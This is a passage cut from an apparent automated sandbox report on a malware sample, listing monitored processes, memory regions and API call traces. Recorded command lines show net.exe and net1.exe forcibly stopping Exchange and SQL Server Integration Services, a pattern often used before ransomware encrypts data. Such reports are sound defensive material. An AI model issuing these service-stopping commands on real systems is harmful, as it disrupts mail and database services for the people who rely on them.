"XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6775 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6776 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6777 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6778 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6779 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6780 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6781 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6782 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6783 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6784 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6785 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 6786 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6787 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 6788 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6789 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 585 os_tid = 0xa74 Process: id = "158" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x56ba9000" os_pid = "0x12ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSExchangeMTA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6819 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6820 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6821 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6822 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 6823 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6824 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6825 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6826 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6827 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6828 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6829 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 6830 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6831 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6832 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6833 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 587 os_tid = 0xab0 Process: id = "159" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x58971000" os_pid = "0x12f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "149" os_parent_pid = "0x1284" cmd_line = "C:\\Windows\\system32\\net1 stop MsDtsServer100 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6834 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6835 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6836 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6837 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 6838 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6839 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6840 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6841 start_va = 0xffe60000 end_va = 0xffe92fff entry_point = 0xffe60000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6842 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6843 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6844 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 6845 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 6846 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 6847 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6848 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6849 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6850 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6851 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6852 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 6853 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 6854 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6855 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6856 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6857 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6858 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6859 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6860 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6861 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6862 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6863 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6864 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6865 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6866 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6867 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6868 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6869 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6870 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6871 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6887 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 589 os_tid = 0x8f4 [0101.035] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfc70 | out: lpSystemTimeAsFileTime=0x1cfc70*(dwLowDateTime=0xf163cc70, dwHighDateTime=0x1d48689)) [0101.035] GetCurrentProcessId () returned 0x12f0 [0101.035] GetCurrentThreadId () returned 0x8f4 [0101.035] GetTickCount () returned 0x23091 [0101.035] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfc78 | out: lpPerformanceCount=0x1cfc78*=1814795300000) returned 1 [0101.036] GetModuleHandleW (lpModuleName=0x0) returned 0xffe60000 [0101.036] __set_app_type (_Type=0x1) [0101.036] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe79c9c) returned 0x0 [0101.036] __getmainargs (in: _Argc=0xffe84780, _Argv=0xffe84790, _Env=0xffe84788, _DoWildCard=0, _StartInfo=0xffe8479c | out: _Argc=0xffe84780, _Argv=0xffe84790, _Env=0xffe84788) returned 0 [0101.037] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.037] GetConsoleOutputCP () returned 0x1b5 [0101.037] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe8cec0 | out: lpCPInfo=0xffe8cec0) returned 1 [0101.037] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0101.067] sprintf_s (in: _DstBuf=0x1cfc18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0101.067] setlocale (category=0, locale=".437") returned="English_United States.437" [0101.069] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0101.069] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0101.069] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer100 /y" [0101.069] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf9b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0101.069] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0101.069] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfc08 | out: Buffer=0x1cfc08*=0x2a4d50) returned 0x0 [0101.069] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfc08 | out: Buffer=0x1cfc08*=0x2ac100) returned 0x0 [0101.069] _fileno (_File=0x7fefdba2a80) returned 0 [0101.069] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0101.070] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0101.070] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0101.070] _wcsicmp (_String1="config", _String2="stop") returned -16 [0101.070] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0101.070] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0101.070] _wcsicmp (_String1="file", _String2="stop") returned -13 [0101.070] _wcsicmp (_String1="files", _String2="stop") returned -13 [0101.070] _wcsicmp (_String1="group", _String2="stop") returned -12 [0101.070] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0101.070] _wcsicmp (_String1="help", _String2="stop") returned -11 [0101.070] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0101.070] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0101.070] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0101.070] _wcsicmp (_String1="session", _String2="stop") returned -15 [0101.070] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0101.070] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0101.070] _wcsicmp (_String1="share", _String2="stop") returned -12 [0101.070] _wcsicmp (_String1="start", _String2="stop") returned -14 [0101.070] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0101.070] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0101.070] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0101.070] _wcsicmp (_String1="accounts", _String2="MsDtsServer100") returned -12 [0101.070] _wcsicmp (_String1="computer", _String2="MsDtsServer100") returned -10 [0101.070] _wcsicmp (_String1="config", _String2="MsDtsServer100") returned -10 [0101.070] _wcsicmp (_String1="continue", _String2="MsDtsServer100") returned -10 [0101.070] _wcsicmp (_String1="cont", _String2="MsDtsServer100") returned -10 [0101.070] _wcsicmp (_String1="file", _String2="MsDtsServer100") returned -7 [0101.070] _wcsicmp (_String1="files", _String2="MsDtsServer100") returned -7 [0101.070] _wcsicmp (_String1="group", _String2="MsDtsServer100") returned -6 [0101.070] _wcsicmp (_String1="groups", _String2="MsDtsServer100") returned -6 [0101.070] _wcsicmp (_String1="help", _String2="MsDtsServer100") returned -5 [0101.071] _wcsicmp (_String1="helpmsg", _String2="MsDtsServer100") returned -5 [0101.071] _wcsicmp (_String1="localgroup", _String2="MsDtsServer100") returned -1 [0101.071] _wcsicmp (_String1="pause", _String2="MsDtsServer100") returned 3 [0101.071] _wcsicmp (_String1="session", _String2="MsDtsServer100") returned 6 [0101.071] _wcsicmp (_String1="sessions", _String2="MsDtsServer100") returned 6 [0101.071] _wcsicmp (_String1="sess", _String2="MsDtsServer100") returned 6 [0101.071] _wcsicmp (_String1="share", _String2="MsDtsServer100") returned 6 [0101.071] _wcsicmp (_String1="start", _String2="MsDtsServer100") returned 6 [0101.071] _wcsicmp (_String1="stats", _String2="MsDtsServer100") returned 6 [0101.071] _wcsicmp (_String1="statistics", _String2="MsDtsServer100") returned 6 [0101.071] _wcsicmp (_String1="stop", _String2="MsDtsServer100") returned 6 [0101.071] _wcsicmp (_String1="time", _String2="MsDtsServer100") returned 7 [0101.071] _wcsicmp (_String1="user", _String2="MsDtsServer100") returned 8 [0101.071] _wcsicmp (_String1="users", _String2="MsDtsServer100") returned 8 [0101.071] _wcsicmp (_String1="msg", _String2="MsDtsServer100") returned 3 [0101.071] _wcsicmp (_String1="messenger", _String2="MsDtsServer100") returned -14 [0101.071] _wcsicmp (_String1="receiver", _String2="MsDtsServer100") returned 5 [0101.071] _wcsicmp (_String1="rcv", _String2="MsDtsServer100") returned 5 [0101.071] _wcsicmp (_String1="netpopup", _String2="MsDtsServer100") returned 1 [0101.071] _wcsicmp (_String1="redirector", _String2="MsDtsServer100") returned 5 [0101.071] _wcsicmp (_String1="redir", _String2="MsDtsServer100") returned 5 [0101.071] _wcsicmp (_String1="rdr", _String2="MsDtsServer100") returned 5 [0101.071] _wcsicmp (_String1="workstation", _String2="MsDtsServer100") returned 10 [0101.071] _wcsicmp (_String1="work", _String2="MsDtsServer100") returned 10 [0101.071] _wcsicmp (_String1="wksta", _String2="MsDtsServer100") returned 10 [0101.071] _wcsicmp (_String1="prdr", _String2="MsDtsServer100") returned 3 [0101.071] _wcsicmp (_String1="devrdr", _String2="MsDtsServer100") returned -9 [0101.071] _wcsicmp (_String1="lanmanworkstation", _String2="MsDtsServer100") returned -1 [0101.071] _wcsicmp (_String1="server", _String2="MsDtsServer100") returned 6 [0101.071] _wcsicmp (_String1="svr", _String2="MsDtsServer100") returned 6 [0101.072] _wcsicmp (_String1="srv", _String2="MsDtsServer100") returned 6 [0101.072] _wcsicmp (_String1="lanmanserver", _String2="MsDtsServer100") returned -1 [0101.072] _wcsicmp (_String1="alerter", _String2="MsDtsServer100") returned -12 [0101.072] _wcsicmp (_String1="netlogon", _String2="MsDtsServer100") returned 1 [0101.072] _wcsupr (in: _String="MsDtsServer100" | out: _String="MSDTSSERVER100") returned="MSDTSSERVER100" [0101.072] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2ace10 [0101.076] GetServiceKeyNameW (in: hSCManager=0x2ace10, lpDisplayName="MSDTSSERVER100", lpServiceName=0xffe85750, lpcchBuffer=0x1cfb28 | out: lpServiceName="", lpcchBuffer=0x1cfb28) returned 0 [0101.077] _wcsicmp (_String1="msg", _String2="MSDTSSERVER100") returned 3 [0101.077] _wcsicmp (_String1="messenger", _String2="MSDTSSERVER100") returned -14 [0101.077] _wcsicmp (_String1="receiver", _String2="MSDTSSERVER100") returned 5 [0101.077] _wcsicmp (_String1="rcv", _String2="MSDTSSERVER100") returned 5 [0101.077] _wcsicmp (_String1="redirector", _String2="MSDTSSERVER100") returned 5 [0101.077] _wcsicmp (_String1="redir", _String2="MSDTSSERVER100") returned 5 [0101.077] _wcsicmp (_String1="rdr", _String2="MSDTSSERVER100") returned 5 [0101.077] _wcsicmp (_String1="workstation", _String2="MSDTSSERVER100") returned 10 [0101.077] _wcsicmp (_String1="work", _String2="MSDTSSERVER100") returned 10 [0101.077] _wcsicmp (_String1="wksta", _String2="MSDTSSERVER100") returned 10 [0101.077] _wcsicmp (_String1="prdr", _String2="MSDTSSERVER100") returned 3 [0101.077] _wcsicmp (_String1="devrdr", _String2="MSDTSSERVER100") returned -9 [0101.077] _wcsicmp (_String1="lanmanworkstation", _String2="MSDTSSERVER100") returned -1 [0101.077] _wcsicmp (_String1="server", _String2="MSDTSSERVER100") returned 6 [0101.077] _wcsicmp (_String1="svr", _String2="MSDTSSERVER100") returned 6 [0101.077] _wcsicmp (_String1="srv", _String2="MSDTSSERVER100") returned 6 [0101.077] _wcsicmp (_String1="lanmanserver", _String2="MSDTSSERVER100") returned -1 [0101.077] _wcsicmp (_String1="alerter", _String2="MSDTSSERVER100") returned -12 [0101.077] _wcsicmp (_String1="netlogon", _String2="MSDTSSERVER100") returned 1 [0101.077] NetServiceControl (in: servername=0x0, service="MSDTSSERVER100", opcode=0x0, arg=0x0, bufptr=0x1cfb30 | out: bufptr=0x1cfb30) returned 0x889 [0101.078] wcscpy_s (in: _Destination=0xffe880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0101.078] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0101.079] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe85b50, nSize=0x800, Arguments=0xffe87f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0101.080] GetFileType (hFile=0xb) returned 0x2 [0101.081] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf9f8 | out: lpMode=0x1cf9f8) returned 1 [0101.081] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe85b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cf9f0, lpReserved=0x0 | out: lpBuffer=0xffe85b50*, lpNumberOfCharsWritten=0x1cf9f0*=0x1e) returned 1 [0101.081] GetFileType (hFile=0xb) returned 0x2 [0101.081] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf9f8 | out: lpMode=0x1cf9f8) returned 1 [0101.082] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf9f0, lpReserved=0x0 | out: lpBuffer=0xffe61efc*, lpNumberOfCharsWritten=0x1cf9f0*=0x2) returned 1 [0101.082] _ultow (in: _Dest=0x889, _Radix=1899104 | out: _Dest=0x889) returned="2185" [0101.082] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe85b50, nSize=0x800, Arguments=0xffe87f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0101.082] GetFileType (hFile=0xb) returned 0x2 [0101.082] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf9f8 | out: lpMode=0x1cf9f8) returned 1 [0101.082] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe85b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cf9f0, lpReserved=0x0 | out: lpBuffer=0xffe85b50*, lpNumberOfCharsWritten=0x1cf9f0*=0x34) returned 1 [0101.083] GetFileType (hFile=0xb) returned 0x2 [0101.083] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf9f8 | out: lpMode=0x1cf9f8) returned 1 [0101.083] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe61efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf9f0, lpReserved=0x0 | out: lpBuffer=0xffe61efc*, lpNumberOfCharsWritten=0x1cf9f0*=0x2) returned 1 [0101.084] NetApiBufferFree (Buffer=0x2a4d50) returned 0x0 [0101.084] NetApiBufferFree (Buffer=0x2ac100) returned 0x0 [0101.084] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MsDtsServer100 /y" [0101.084] exit (_Code=2) Process: id = "160" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x570c9000" os_pid = "0x12f8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSExchangeSA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6872 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6873 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6874 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6875 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 6876 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6877 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 